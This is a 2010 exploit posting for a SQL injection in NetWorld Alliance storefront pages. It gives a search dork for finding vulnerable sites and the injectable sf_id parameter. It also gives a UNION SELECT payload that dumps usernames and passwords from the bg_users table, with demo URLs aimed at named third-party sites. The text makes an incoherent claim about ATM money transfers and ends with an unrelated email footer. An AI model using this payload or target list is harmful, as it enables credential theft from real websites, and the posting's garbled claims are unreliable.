Networld Alliance suffers from a remote SQL injection vulnerability.
7a3e111d61ba6ceb6575a8c8f55fbc3c34b529bdd751a74b90b1b991a11e5af9
# Exploit Title: NetWorld Alliance SQL InJection
# Date: 27/06/2010
# Author: dev!l ghost
# Email: aws(at)live(dot)it
# Site : www.vbspiders.com
# Script url: http://www.networldalliance.com/2010-digital-signage-future-trends-report
# Price: US$797.00
# Version: N/A
# Tested on: Windows
# CVE : ()
:::::::::::::::::::::::::
=================Exploit=================
Descript: This Script Is For ATM Machine And How To use it and give and
get and transfer money from it
it is private script
---DorK:("© 2010 NetWorld Alliance")---
You will get a lot of sites enter any site
and then Put this (storefronts.php?sf_id=any number)
after id put any number and start inject
----exploit----
{{exploit}}
http://www.xxxxxx.com/storefronts.php?sf_id=(39) --SQLI--
after the number put this
(+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--)
DeMo1
https://www.kioskmarketplace.com/storefronts.php?sf_id=-39+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--
DeMo2
http://www.digitalsignagetoday.com/storefronts.php?sf_id=-243+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--
---------greatz----------
Greatz to all my frinds and the all muslims
and Golden Ice and mr.ip
and the all who know me
And VBspiders
thank you
_________________________________________________________________
Hotmail: Trusted email with Microsoft’s powerful SPAM protection.
https://signup.live.com/signup.aspx?id=60969